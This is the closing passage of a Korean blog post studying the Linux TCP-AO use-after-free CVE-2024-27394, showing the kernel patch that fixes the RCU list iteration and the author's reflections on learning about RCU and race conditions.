  int family, l3index;
@@ -1090,7 +1091,7 @@ void tcp_ao_connect_init(struct sock *sk)
  l3index = l3mdev_master_ifindex_by_index(sock_net(sk),
        sk->sk_bound_dev_if);
 
- hlist_for_each_entry_rcu(key, &ao_info->head, node) {
+ hlist_for_each_entry_safe(key, next, &ao_info->head, node) {
   if (!tcp_ao_key_cmp(key, l3index, addr, key->prefixlen, family, -1, -1))
    continue;

Conclusion

이번 글을 다 작성하고 가장 먼저 드는 생각은 처음부터 너무 어려운 취약점을 잡고 분석한 것 같다. 2024년에 나온 최근 취약점이기도 하고, TCP 내부 함수에서 트리거 되는 UAF 취약점이여서 만만하게 보고 시작하지는 않았지만 생각보다 너무 어려웠다.
물론 공부하면서 RCU 알고리즘 작동 방식, connect() 함수 호출 스택, Race Condition 취약점이 어떤 식으로 발생하는지 등 해킹 공부를 시작하고 CTF 위주로만 공부하면서 접해보지 못한 부분들에 대해서 많이 알게 되어서 도움이 많이 됐다.
하지만 그만큼 이해가 안되는 부분도 많았고(특히 tcp_to_connect_init() 함수의 hlist_for_each_entry_rcu 순환 부분), PoC 코드도 실행해보지 못해서 많이 아쉬움이 남는 분석이였다.
나중에 실력을 많이 키우고 다시 분석을 도전해 봐야겠다.

Reference

https://blog.theori.io/deep-dive-into-rcu-race-condition-analysis-of-tcp-ao-uaf-cve-2024-27394-f40508b84c42

d0razi's brain

탐색기

RCU Race Condition Analysis of TCP-AO UAF (CVE-2024–27394)

Read-Copy-Update (RCU)

ExpRace

CVE-2024–27394: TCP Authentication Option Use-After-Free 취약점

Conclusion

Reference

그래프 뷰

목차